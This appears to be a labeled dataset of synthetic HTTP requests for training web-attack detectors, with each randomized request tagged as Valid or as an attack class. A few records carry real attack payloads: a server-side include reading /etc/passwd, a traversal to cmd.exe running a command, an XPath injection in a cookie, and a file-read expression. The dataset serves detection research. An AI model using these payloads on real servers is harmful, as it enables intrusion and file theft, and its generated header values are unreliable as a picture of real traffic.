class: Valid
GET /3MATsam31LA6T/bngDwinnt/yc25sc/gnteEsdood82id/isaitoEpi8bttn/v6dk3@b1VNxAM6N/sSp3Lw/kl2TghWbiiYz4HW3/euteia/aHA98NKfu.html?wnLhtuar=801446262&-x3group by_8Go=278&6hErjdivnsa=eo&ttqir=41340&OrkoItCt=zg9rtEmrtemgelaaa3&ectnpIe3=i2%3Ee+embodyeiie&oihotn=netcatzU%26styleiwi&dznoeM1llso=onotoqtoB3e7aUhsin&W5bcmduQ=7ulmtmddn4iiRrt5iP&tdhannionIi=850&RODaDb3=oE.8k99fR&sInmfmuc=tG4y7kxeLsf HTTP/1.1
Host: www.a7nsrohk.be
Connection: close
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=4
Client-ip: 226.208.80.28
Cookie: lrKB.ym0d=4523221
Cookie2: $Version="6"
Date: Sat, 31 Dec 05 23:48:52 GMT
ETag: "VxVp5XA13z8f4JWT"
Expect: 100-continue
From: Tpee@itzhRk.it
If-Modified-Since: Wed, 10 Dec 08 18:37:03 UTC
If-Unmodified-Since: Thu, 30 Dec 04 03:06:42 UTC
If-Match: "peMPWI3.a1TcyRM"
If-None-Match: "2P8jKbEXbpzhN8x3Q6"
If-Range: *
Max-Forwards: 3
MIME-Version: 0.5
Pragma: rHsgtnig=ns
Proxy-Authorization: NTLM ZGVlMGFlZUU1NGl0dm5lYTJ3YW5zZW9BRXN0YWV3ZXN1N2Jscg==
Authorization: ogcs 19tiTz=67xf
Range: 6-,405-,74-23633
Referer: http://d7gOt9.cz/onIb/iewholbt/fa7f/rrrh/t4sionsw.exe
TE: gzip;q=0.5,deflate;q=0.6
Trailer: Transfer-Encoding
User-Agent: eiqn.38o http://www.eoo0ig.gov
UA-CPU: Sparc
UA-Disp: 3770,9157,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 2344x540
Via: eni/1.5 89.141.50.29, 8.8 www.itlrn.shtml, n411e/0.0 www.btotiwaa.gif
Transfer-Encoding: compress
Upgrade: wR3/7.6, otia/4.2, tdnt3/1.1, nttir/7.7, l7tde/6.2
Warning: 764 www.Zhr1sd.htm "u9u0" 
X-Forwarded-For: 137.114.108.160
X-Serial-Number: 9425321413781535
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 13278
Start - Id: 5212
class: Valid
PUT /9er5s.tiff? HTTP/1.0
Content-Length: 58
Content-Language: 6ealirya,i1otbws
Content-Encoding: deflate
Content-Location: http://www.oehetad.it/tnihepn/simD.png
Content-MD5: bWlkZHVvbm1xeDhxc2VueA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 07 Nov 07 04:43:28 UTC
Last-Modified: Mon, 02 Feb 09 22:59:37 UTC
Host: www.iit7SYssnt.biz
Connection: k0jlno
Accept: audio/*;q=0.8, audio/basic
Accept-Charset: *
Accept-Encoding: 
Accept-Language: bnhuo-ha, 3rrh-2ret, ea-ntrxona, dosee-scOmGRdm
Cache-Control: no-cache
Client-ip: 228.206.85.169
Cookie: MDwtftpO9=bgsound8;KCphp@Bxn@4Xh=e--;ecdfehoNrts=aTOWVlMOa;eiaeooijawoqra=3$~R)-lonrusforms7;elbntwino=ovekp
Cookie2: $Version="44"
Date: Mon, 28 Aug 06 16:21:34 CET
ETag: W/"KtZ@RSx8nS8D1IvJw@1"
Expect: 100-continue
From: rbstcLe8@fi0i.uk
If-Modified-Since: Tue, 30 Mar 10 12:35:20 UTC
If-Unmodified-Since: Fri, 30 Jun 06 12:22:10 GMT
If-Match: *
If-None-Match: "k2TohrD847d9_kq_h"
If-Range: "vmHkvTCpxKEinWRF16"
Max-Forwards: 01
MIME-Version: 3.8
Pragma: 7a='cq'
Proxy-Authorization: NTLM dWxlb2hhZHJyaHlhbmdmbXM3OXJ0dThvZzdOQmN0THlyZjA1ZmV2anJydA==
Authorization: NTLM b2libmhmUnR3c2Vpb3BlZGlzNGVpcGRjaWlwYW5zRW9xdEdZZWF0c24=
Range: 842322-
Referer: /nsfSom/cjR9asq/yitudxae.asmx
TE: deflate;q=0.8
Trailer: Date
User-Agent: Mozilla/0.0 (X11; U; Open BSD i386 5.6; 8i-ge; rv:3.0.2) Gecko/74226453
UA-CPU: MIPS
UA-Disp: 5711,593,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 976x461
Via: FTP/4.9 www.uo3t.tiff, Ere/4.0 www.E2ti.htm:52695
Transfer-Encoding: deflate
Upgrade: KrhdGB/4.0, shDEy/8.3, qefaou/5.5, axat/2.9, hEyue/8.6
Warning: 646 www.eBtlm.js "taDea3t" 
X-Forwarded-For: 121.55.87.94
X-Serial-Number: 083639126
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

kmnpAadie=eAnodee&tt82tyiedeT=56593&sQ3EyusIrl=nW_ERgMqGHs

End - Id: 5212
Start - Id: 3959
class: Valid
POST /eo0kovqMMtsJ.y20WGNe/fzFER_.html? HTTP/1.1
Content-Length: 218
Content-Language: u
Content-Encoding: identity
Content-Location: /we1e9s/adE1nme/aouN4ne/iumemE/eWnn.shtml
Content-MD5: UW5zZWNlTndOaGV6dDdMdg==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 26 Aug 06 08:49:39 GMT
Last-Modified: Fri, 10 Mar 06 06:50:33 UTC
Host: 178.153.34.125:80
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: us-ascii, iso-8859-9, x-mac-arabic;q=0.5
Accept-Encoding: deflate
Accept-Language: tsea32ee-ettC;q=0.1, o6-nan;q=0.9, ss9eii-etihaml;q=0.7
Cache-Control: no-store
Client-ip: 97.219.209.5
Cookie: demt=5950161;turaopten=77;dmTns0adg=smmeUuo6VcK;APVo=03950;bx3aaio=mhae5t
Cookie2: $Version="1"
Date: Wed, 26 Oct 05 05:02:52 GMT
ETag: "cRPrR_WMKHJ7ipmhoi"
Expect: rd0e
From: etfaK@Esrsint7.cz
If-Modified-Since: Thu, 14 Dec 06 06:16:55 GMT
If-Unmodified-Since: Thu, 22 Mar 07 06:35:08 GMT
If-Match: "xXks8M-6KhKqZmGka"
If-None-Match: *
If-Range: "mdV@Om2a6qguKGv"
Max-Forwards: 7540
MIME-Version: 7.8
Pragma: emt='brmst'
Proxy-Authorization: Digest cnonce="yoehanfr"
Authorization: Basic YXdxczpkYmhqZWk=
Range: -1776
Referer: http://www.htno.biz/cehnda/eUkc/eEriLTG/knme.wmn
TE: trailers,gzip;q=0.3,deflate;q=0.3
Trailer: Accept
User-Agent: eq6s2H http://www.GnUteBo.de
UA-CPU: Sparc
UA-Disp: 905,734,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 6900x1160
Via: ennd/0.5 173.107.206.79:640, HTTP/4.7 170.86.87.110, TzM3/0.9 www.obysmgee.shtml
Transfer-Encoding: gzip
Upgrade: tnoc/2.8, twh/6.6, d0clah/7.2
Warning: 029 www.TasA.js "noEv8wnrwRfeseqNeptc" "Sat, 01 Nov 08 03:38:50 CET"
X-Forwarded-For: 152.216.247.81
X-Serial-Number: 194828763
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

celMeishoemTwoU=mgd&Ilctt7a= lslink6&nangojeI6=365166154&1dHdhL=637275&eanehi=dhalWOf94_&seUeatgiih=strs&H0GJj=1199900862&owziczeof1=fdoog&Lhy=egse-]hlht<tsaesGe&7UWAh=os&Eru3e3ozdeh=lxMGDJMujP&smsp=5-Epairehome2sw

End - Id: 3959
Start - Id: 23496
class: Valid
GET /EzSoaaihotem1/oydNgt/irtt/nhaS/ejbvywT5/d4b/sock_stream66cBmor5H/zlwvGn/igqEZ5/by/phe8.shtml? HTTP/1.1
Host: 210.10.223.56:80
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: *;q=0.6
Accept-Language: *;q=0.3
Cache-Control: 2g='a5xG5uih'
Client-ip: 48.126.129.52
Cookie: btrtdywabse=l;zpwltttoWAe=6.64b5yYmv;6qtezwedradHe=shutdown2ff;7EnullqCRgIJKT=eelHpktr6
Cookie2: $Version="08"
Date: Tue, 24 Aug 04 10:15:45 UTC
ETag: "nzDiXVOYgqMqegC"
Expect: euei
From: e8so@hvw5wneayr.net
If-Modified-Since: Wed, 23 Aug 06 21:52:51 GMT
If-Unmodified-Since: Thu, 10 Feb 05 23:38:01 GMT
If-Match: "l81GT@MVtXAru@7"
If-None-Match: "EXnt8v9LbnbLLbRnl"
If-Range: *
Max-Forwards: 333
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: ntfF1e iWcf=zrah
Authorization: NTLM dDA3cmV3Y0hjMmlwM0V5bnF0c3RjMDZydGtkb0U3YW1zZWV1YWFmdzJhbHJ2QWU=
Range: 58-,728-,-0
Referer: /Xnmc/iNiOd/nh2eAdtc.txt
TE: trailers,trailers,trailers
Trailer: Expect
User-Agent: Mozilla/1.2 (Windows; U; Windows NT 0.4; es-fn; rv:1.9.2) Gecko/05025303
UA-CPU: x86
UA-Disp: 674,494,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 4426x0282
Via: 2.2 94.90.111.133, FTP/8.6 www.r7rdantn.js:0
Transfer-Encoding: gzip
Upgrade: akoe/8.8, eee/8.5, nl0i/0.3, noNso/2.0
Warning: 811 www.lroqoi.shtml:7678 "achtda" "Thu, 03 May 07 03:52:45 UTC"
X-Forwarded-For: 232.249.135.171
X-Serial-Number: 22339968152502117473
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23496
Start - Id: 39727
class: SSI
GET /48ao0B3f3Grct/wFueL.hp2/Tih-KwGFErS-vlink3/o9xmGiBFv/ne0nrnhh/lhD/6NFA_vKQ/sLtum@S6pqKKyEW0M_/fNeiQANzi1.q3L7/sAvJOqY1.css?zrMoqnede9tcz=Ui+%2Boxt%7C-%3Crwr%7Ce+h&acaaiS7cd=50095&c33r=metaeyem&neoo=%3C%21--%23include++virtual%3D%22%2Fetc%2Fpasswd%22+++++--%3E&rmnwZTy88DUN=aAraqcettiEa&1tetfefwt3ia=npLPZ4e2&ekwere5rob=581574 HTTP/1.1
Host: 82.130.143.148
Connection: close
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: *;q=0.6
Accept-Language: *;q=0.1
Cache-Control: no-store
Client-ip: 55.223.250.116
Cookie: ktnna=5@JHgyCGc
Cookie2: $Version="346"
Date: Thu, 19 Apr 07 03:11:55 UTC
ETag: "S3drG_PYWSBZhlFGgd0W"
Expect: tonsult
From: iltkt32@r7Muj.it
If-Modified-Since: Tue, 23 Aug 05 15:39:37 UTC
If-Unmodified-Since: Thu, 07 Apr 05 22:40:07 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 379
MIME-Version: 4.8
Pragma: nh9eh=aWi
Proxy-Authorization: Digest nc=CBADdAaC
Authorization: Digest uri=http://www.itee.fr/t7odpmuc/1nej/tEnlKe/peserlV4/9inen.swf
Range: -58,-7,-12255
Referer: http://opxlb.st/rrsa/fsMoi2ek/7biewi/abw6aBqY.swf
TE: deflate,trailers,trailers
Trailer: Host
User-Agent: Mozilla/6.3 (compatible; Konqueror/1.7; Mac OS X; euoapIEe; 3hbkea; oeralmnys)
UA-CPU: x86
UA-Disp: 9987,6027,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 066x3039
Via: 1.7 www.ymcm.js
Transfer-Encoding: compress
Upgrade: asg/6.6, aeyyeD/5.2, eeae/5.5, sfi/1.0
Warning: 957 www.4Ggtd.jpg "toiUl7sojbevrsrhed" 
X-Forwarded-For: 51.221.13.87
X-Serial-Number: 878025809262
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 39727
Start - Id: 6977
class: Valid
POST /5oJeFiZ07ZxgI/aGZgUoaF0l-i/ttrej/mfzels/rq9p7Dqo/o4RXwFrqp1A1iCfu/qnteHngbIhvOnx/i8t49DvXvw1U8FHP/1Coayvod/e_ISV@Jzvj4bFGQaPq/rt_V2@MLNw9oGv.mdb? HTTP/1.0
Content-Length: 175
Content-Language: o,krprps
Content-Encoding: deflate
Content-Location: http://ta2w6den.fr/srhpto/atsw8aa.asmx
Content-MD5: Y3dydG5uZ3JmZFhCNTNFZw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 01 Jan 10 17:18:14 UTC
Last-Modified: Tue, 05 Oct 04 16:55:57 CET
Host: 202.75.138.7
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *;q=0.6
Accept-Encoding: *
Accept-Language: aeaimnof-B8s, nM-pwssa;q=0.5, n0-n3rieaP;q=0.3, qe-llFrhc;q=0.9
Cache-Control: min-fresh=6
Client-ip: 252.24.113.133
Cookie: FSendetpan0lazq=qih9;OWAV0CRIlocationsdocumentS=a7VEEMyh1tqo;syfrn7axiUdvti=rneTecet;am=s xml=xsa
Cookie2: $Version="082"
Date: Tue, 07 Nov 06 05:06:55 UTC
ETag: W/"NL_m1mDqJIQByLH"
Expect: ghuei=Eteee;uhBazrt=i5ld
From: rcaasa4a@Wrn2iB.ch
If-Modified-Since: Tue, 15 Apr 08 02:50:25 GMT
If-Unmodified-Since: Sat, 25 Sep 04 08:15:43 CET
If-Match: "QGJW94s3JIy2dgd"
If-None-Match: *
If-Range: Wed, 04 May 05 06:54:32 CET
Max-Forwards: 6
MIME-Version: 2.6
Pragma: teszo=siNzqta
Proxy-Authorization: Digest qop=auth
Authorization: Digest response="bf5D739cA18Ac5D2daaFFaB8dBEBA2aa"
Range: 2338-,-6,504171-
Referer: /tndYjr.cfm
TE: gzip;q=0.5,trailers,trailers
Trailer: Host
User-Agent: Mozilla/8.9 (X11; U; Linux i386 3.9; el-nb; rv:8.1.7) Gecko/60721014
UA-CPU: 68000
UA-Disp: 337,1606,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 040x289
Via: 0.2 173.22.97.34, tw8o7E/4.9 16.114.166.47
Transfer-Encoding: ati4o
Upgrade: srd/5.1, ndhns/4.1
Warning: 295 140.22.217.163 "uv2fUxytlf3rEnqh" "Sun, 03 Jun 07 20:15:54 GMT"
X-Forwarded-For: 5.129.82.226
X-Serial-Number: 95729667
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

nbeOemItjxheY=0151545129&5sYzlyO3npth=eR&aleeoAyHa=r&aintonaYeaosI=]&ata5tlu&oaen=55270&2eed=rQL9Q&Vdwnd=rsystemp|&fytnapngSbw=za1&5ioAhsf=n2eCW6AD&mvysoojo=oue5v&wefd=r

End - Id: 6977
Start - Id: 14750
class: Valid
GET /dCLqhfqQS0udp_ojPqb/isLB3ym.LQzvNq9ubw/acMNesL/lmhfaose1merobxt/hX5ufX/ixcHjolM.html?sblinnum=alGo.JA&ineeAr2ms=i%3FPira%3Br&osamueval_1It=26&otaoAhobOenl=i1+i%25te%26e0k%3Aa&sGuabeiCd0qs=3&Nniyueeg4lszeqj=ae%26tbodynaciI%7Enc3i%26&Y5ftpkpm2-8Z=uo&e8=68991&ptbcjihoi=62&svlQIzCwget@oqd=+&rfueloo2onthe=51&OzoHhc4ofyosdE=ntua5cn7eiMmnooos HTTP/1.0
Host: 22.105.181.219
Connection: close
Accept: application/rtf
Accept-Charset: *
Accept-Encoding: *;q=0.5
Accept-Language: *
Cache-Control: hc2rn5=uTYo9
Client-ip: 157.191.153.50
Cookie: aa9aTR=32;gTSBr6@NbN=window.opene;Wml=eyAT5FjL.eH8;i80retweaAleequ=noaotek9cqr
Cookie2: $Version="8"
Date: Thu, 31 May 07 10:27:40 UTC
ETag: W/"tCbqoq6D.mb74GAjvP"
Expect: 100-continue
From: owsogmh@sdEtisrsme.org
If-Modified-Since: Sun, 04 Apr 10 12:01:53 UTC
If-Unmodified-Since: Wed, 15 Jul 09 24:33:34 UTC
If-Match: "O2X-lJm0pu-vcFSZXyg"
If-None-Match: *
If-Range: Mon, 20 Jun 05 23:21:11 CET
Max-Forwards: 047
MIME-Version: 6.6
Pragma: ih='o2n2et2u'
Proxy-Authorization: el3ew eon38=myylbi
Authorization: Digest qop=ctXduTnM
Range: 48-90
Referer: /2fcdlstr/0iwl/epdtpln/xxdoog/bna6N.cgi
TE: chunked;q=0.5,gzip;q=0.4
Trailer: Accept
User-Agent: Mozilla/0.4 (compatible; adeYfme; Open BSD i586; OrfNsaa)
UA-CPU: StrongARM
UA-Disp: 6549,336,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 283x1210
Via: n4as/5.0 www.amon.tiff, 1.0 250.92.180.40
Transfer-Encoding: identity
Upgrade: fnhcG/7.7, 5Uaboe/0.6, satvhh/2.7
Warning: 491 www.jeuiAh5t.htm "wjeodstn" "Wed, 27 May 09 09:21:52 GMT"
X-Forwarded-For: 99.254.129.225
X-Serial-Number: 75677711103462595705
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 14750
Start - Id: 44338
class: OsCommanding
GET .%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.LSAeh.st
Connection: close
Accept: */*;q=0.9
Accept-Charset: *;q=0.9
Accept-Encoding: *
Accept-Language: *;q=0.8
Cache-Control: no-transform
Client-ip: 216.220.28.19
Cookie: eosleoth=Anm8zy~
Cookie2: $Version="29"
Date: Thu, 11 Aug 05 20:05:31 UTC
ETag: "pOapT_4.CIXI5gO"
Expect: tnstr3=Ht7tPac;rhjSmod
From: ssaaei@srTei5is.de
If-Modified-Since: Tue, 19 Aug 08 04:28:08 GMT
If-Unmodified-Since: Thu, 15 Feb 07 09:07:32 CET
If-Match: "0Ed436M-Rj3k1HF1-n"
If-None-Match: *
If-Range: Fri, 09 Mar 07 22:55:02 UTC
Max-Forwards: 76
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: NTLM Y2lJbGVhYW5vbnlzbm5oZ255M0k2ZzF0aDcyMmJ3dDE2Y210dA==
Authorization: Basic ZUFvZTpvM2VBc3Nzbw==
Range: -4,7986-,046-946045
Referer: http://www.ageiy.gov/fyqa/syame.png
TE: trailers
Trailer: If-None-Match
User-Agent: bdrswRnnuttit2ka
UA-CPU: x86
UA-Disp: 8897,9221,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 127x111
Via: uet/6.7 www.cwocaih.htm
Transfer-Encoding: compress
Upgrade: srlma/8.2, So6/5.2, moPz/7.3, aeng/1.5, aoyO0a/8.2
Warning: 450 137.33.40.57 "ymhep" "Sat, 27 May 06 20:03:51 UTC"
X-Forwarded-For: 81.125.200.90
X-Serial-Number: 4707675607021024979
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44338
Start - Id: 9863
class: Valid
GET /aa3i30oointeSxi7/eee.html? HTTP/1.0
Host: 55.171.74.37
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: i-slpoTT
Cache-Control: no-cache
Client-ip: 117.106.21.204
Cookie: oyelc0HjlOaaau=840016;x33%uAygc=686;sedihanriilp=nwfd
Cookie2: $Version="53"
Date: Wed, 12 Mar 08 11:15:57 UTC
ETag: W/"JvZhCo@X.g-smH3l"
Expect: 100-continue
From: eysn4@teOuatxl.org
If-Modified-Since: Mon, 19 Jul 04 21:07:02 GMT
If-Unmodified-Since: Fri, 28 Dec 07 14:03:11 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 0997
MIME-Version: 2.6
Pragma: iyeri='0q8t'
Proxy-Authorization: Basic YWUwb3RlOmp4dG9z
Authorization: Digest response="8E14937E2cA8d70470EdAb3B4C1ECE38"
Range: -116,600-315,197733-5
Referer: http://www.qnLtttl.de/e7ac/oyph6wa/L6ovoWOe/rdelyU9.txt
TE: trailers
Trailer: Range
User-Agent: iaiIon/9.4.2.5.8
UA-CPU: MIPS
UA-Disp: 1962,9364,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 620x416
Via: asE/7.4 201.74.179.22
Transfer-Encoding: deflate
Upgrade: dsi/0.4
Warning: 812 www.raItj.jpg "oaso85cantolse0N" "Sun, 16 Nov 08 15:47:55 GMT"
X-Forwarded-For: 197.251.52.207
X-Serial-Number: 09946739061718
----: ----------------
~~~~~: ~~~~~~~~~~

null

End - Id: 9863
Start - Id: 50080
class: XPathInjection
PUT /8mnroltLeudmu/tefah3rcf/a3WptYvM6gNBN9/eYHW/mocha9A2vXKNpaT/zcRx/bW/_dtelnetQO6Szboot.ini0acat-h.gif? HTTP/1.1
Content-Length: 62
Content-Language: v,twnca,o
Content-Encoding: gzip
Content-Location: http://ud6irga.be/se2d/iesssy/netooE/theev7so.conf
Content-MD5: bm03aWVtbG1NNWFuYUVkZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 15 Mar 05 06:57:42 GMT
Last-Modified: Sun, 14 Dec 08 20:42:03 UTC
Host: www.lmts.cz
Connection: bmsp
Accept: video/*;q=0.8, video/*;q=0.4, text/plain;q=0.2
Accept-Charset: iso-8859-3, koi8;q=0.5, cp-932;q=0.2, ks_c_5601-1987
Accept-Encoding: *;q=0.9
Accept-Language: *
Cache-Control: min-fresh=33
Client-ip: 82.164.87.92
Cookie: ydan5oeh7u=toOn'   or     6     <    count(path/child::*)   or    'ln'   ='
Cookie2: $Version="19"
Date: Wed, 01 Apr 09 14:41:44 CET
ETag: W/"61qGZhqXnyrqR9K"
Expect: 100-continue
From: a2ahor@ihbawa.net
If-Modified-Since: Thu, 12 Jan 06 09:34:10 CET
If-Unmodified-Since: Mon, 25 Oct 04 10:49:02 CET
If-Match: "F0SmlOYRLx53okhUC"
If-None-Match: *
If-Range: "goSVZVVUfu4ID2VF36Mf"
Max-Forwards: 65
MIME-Version: 1.2
Pragma: ri1tatti='stenjd'
Proxy-Authorization: NTLM ZW9zdXFPM1lvdGU0ZmV0amlzc0ViaXRkYXRFZXRuYW50dHNsdUVzTXM=
Authorization: wats ebecz=eAO3man
Range: 5-3248
Referer: http://www.EsBoxU.com/lsst.mdb
TE: deflate
Trailer: Transfer-Encoding
User-Agent: LeasgSd/6.4.4.3.8
UA-Disp: 6721,293,16
UA-OS: Solaris
UA-Color: color16
Via: HTTP/9.5 108.165.249.210:14905, HTTP/5.5 189.7.110.159:95379, oAltyt/7.9 45.141.146.172
Transfer-Encoding: gzip
Upgrade: HiS/8.4
Warning: 655 8.146.131.14 "dxoce5aih3rnnfYua" "Tue, 17 Oct 06 23:28:47 GMT"
X-Forwarded-For: 111.165.36.41
X-Serial-Number: 254807
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~

fr6foried3m=ts8&7YmQb.kvzj_z=e@z_ZGUul&61itafsmdbi=1H.y7@Z

End - Id: 50080
Start - Id: 44820
class: PathTransversal
GET /cetHmoctLenailmfi/wuz8y1P0@FMD/mYNAhJVVaNkVwnS0C4W/0trN/zQtonidczaPoh/ls1formLUNaccess_logqqx_-dW8/TCp.swf?aaaiwess=doc%28file%3A%2F%2F%2Fc%3A%2Fclova%2Fatxonln.xml++++%29&0position@style=1PK&eeawvr0nr1sUh=eliossuet%7Emida&l8ofei8yn=lK5qTmj9H&e8wo46e2sCms=mmhasvwIs HTTP/1.0
Host: 193.169.140.81:80
Connection: dAsng3Us
Accept: application/*;q=0.8, audio/x-wav, application/postscript;q=0.2
Accept-Charset: *;q=0.9
Accept-Encoding: compress, gzip
Accept-Language: *;q=0.7
Cache-Control: no-store
Client-ip: 92.163.213.217
Cookie: W2X-9gGQI=slRmwmdhq;id0csz=>eavz@8Nt;t5m3mhruur=e0iss
Cookie2: $Version="23"
Date: Fri, 19 Aug 05 08:12:11 CET
ETag: "5dTB3_gAXG5Nx4RIfSTO"
Expect: 100-continue
From: ecsie0r@aat1r.com
If-Modified-Since: Sun, 07 Jun 09 04:15:13 CET
If-Unmodified-Since: Sun, 24 Jan 10 21:56:24 CET
If-Match: "arvxUYUB2bHptKA2"
If-None-Match: "grIOzWd4mODJSc-sGhxE"
If-Range: "EXjq0t12jkaHZPYSy"
Max-Forwards: 89
MIME-Version: 9.8
Pragma: s=yaEdmem
Proxy-Authorization: NTLM YUhlQmxaMW5vM090THVlaXJyZXVldG5zRWJvOWhmbmplbm8wcld3c21udlpwZWU=
Authorization: eH4teM jsxnoc=5ihxiqi
Range: -7,891-,-651
Referer: /celHiie.txt
TE: trailers,gzip;q=0.7
Trailer: Transfer-Encoding
User-Agent: Mozilla/2.8 (compatible; Konqueror/2.9; Open BSD i586; htLe; lsanEeez; as2ltos)
UA-CPU: x86
UA-Disp: 5327,238,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 123x704
Via: HTTP/9.9 240.52.195.67
Transfer-Encoding: compress
Upgrade: neacoe/5.1, 7qfTia/9.7, negety/9.4, hbiry/6.4
Warning: 279 5.34.104.253 "ycytrdqnsuf" 
X-Forwarded-For: 65.58.42.42
X-Serial-Number: 13064
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44820
Start - Id: 30633
class: Valid
GET /3jXSLZwj/ewe/SIzAPT-cAg/ecnitrLTe/uhPk2fBS6eOSdHFr6/mvbscriptKPBZSCKQSJA/agBm2FvYUKMk65/iL0hYaMACvmQt/5TF3GQ0e/wOnxBx@6fclSSaafuz/w22xcRUgswrnbHN/ar7lNTth2aI7njsa.shtml?Tei=j%7Eior2nitrt%28lsEajx&dl3nOEr=delete0Qhsock_stream&n0r=%3BetcalntiemO%2F4nmr&5n4=toKT1STjcGZ&psee=81101 HTTP/1.1
Host: 47.209.40.14
Connection: oSayau
Accept: */*;q=0.8
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: no-store
Client-ip: 152.187.29.149
Cookie: hlep2z6e=idu;rrg1=e't;Sprocessing-instruction7tBlawA3=td2;fTynh=dahetqees;ye3ho6tfrewl6=7yimvoll
Cookie2: $Version="530"
Date: Thu, 05 Apr 07 10:25:44 UTC
ETag: W/"zq5kPQg.QD_a9pF5"
Expect: wswlju58
From: rauo@asiuoU3.com
If-Modified-Since: Wed, 24 Dec 08 07:53:06 CET
If-Unmodified-Since: Sat, 05 Aug 06 24:16:27 GMT
If-Match: *
If-None-Match: *
If-Range: "9pQWiMNSVtMkW6NXsYU"
Max-Forwards: 269
MIME-Version: 7.9
Pragma: nEN='rlmeis'
Proxy-Authorization: NTLM aWVpZXBoZWpjaGlua2VpdzFpZWV5RWhhdGRpZWVsd2JuZg==
Authorization: Digest username="cgE1"
Range: 53103-346,27315-,4154-522
Referer: http://www.eweng5R.cz/teSaks/emshaltx/OtzvEeoo/gflRa.php
TE: deflate
Trailer: Transfer-Encoding
User-Agent: Mozilla/9.5 (Machintosh; U; Mac OS X 7.1; tt-rr; rv:1.0.8) Gecko/19542386
UA-CPU: StrongARM
UA-Disp: 436,0901,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 7462x1873
Via: het/7.0 www.gsew.js:12150, omen/9.2 www.hikrncsw.tiff:76
Transfer-Encoding: identity
Upgrade: 1iwe/2.5, d7sg/1.2, hcsso/4.8
Warning: 990 www.lwaorheo.jpg "ano2taagrOTdb1dash" 
X-Forwarded-For: 115.201.164.251
X-Serial-Number: 330746
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 30633
Start - Id: 20539
class: Valid
GET /thliaCreQnsdf/39_iagVF_-8WR1ImR/ture2/mfz4gWw7iRiNx/kg63@blXxDK0G26RZ/VDm8dJx_exFGeW/oOgSY.T/tjzdB/uEroizeMHWx.g66t/ojetryaeotieOrw.msf?cUusqxRneoOuni=w_Izpxi&BWFK8mochaaUNX=iWSTgLAM&lft=NHpan&e2=etcoptu&nrbiEweLteoed=5478425&7poeiu4aehcstsg=xFz&zeawh0=rwjckF-3Bm5&qJj-qaPm2xmlj=92 HTTP/1.1
Host: www.msccs.gov
Connection: keep-alive
Accept: audio/*;q=0.6, image/gif, application/postscript;q=0.3
Accept-Charset: *
Accept-Encoding: identity;q=0.5, compress, identity;q=0.7
Accept-Language: *
Cache-Control: l=u7ie
Client-ip: 249.184.252.20
Cookie: KNWGhTbv5Q=kdfao6oiatlg2etg;asaoeatvaeTnn7h=810;t6TwTxr=lsii;e8ccsuqL= os=
Cookie2: $Version="517"
Date: Mon, 19 Mar 07 14:58:51 GMT
ETag: W/"emH46gfHPSvicmXyRJ"
Expect: 100-continue
From: bcrhEeb@Zcto.com
If-Modified-Since: Mon, 21 Jul 08 08:35:57 CET
If-Unmodified-Since: Thu, 27 Dec 07 17:27:26 CET
If-Match: *
If-None-Match: "SCzzi0jhYVrThPd6"
If-Range: Sat, 22 Aug 09 16:19:24 UTC
Max-Forwards: 2266
MIME-Version: 6.3
Pragma: nhi=Wt70sv
Proxy-Authorization: Digest username="kJtoeurg"
Authorization: Digest algorithm=MD5-sess
Range: 877-
Referer: http://www.1eseEurl.cz/au9ostng/2aedzeSp/lyzur/NradOsn/a05ochw.exe
TE: deflate,chunked;q=0.3,deflate
Trailer: If-None-Match
User-Agent: Mozilla/2.2 (compatible; Konqueror/6.9; SunOS sun4u; atqaha)
UA-CPU: x86
UA-Disp: 9823,4223,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 2533x094
Via: A8as/2.3 www.ne3lS.htm
Transfer-Encoding: gzip
Upgrade: aOnbin/5.3, cUojlc/5.1
Warning: 151 146.124.39.49:89 "lAPnn" "Sat, 02 Jul 05 07:47:23 GMT"
X-Forwarded-For: 206.2.157.2
X-Serial-Number: 48113953855
----: ---------------------------------
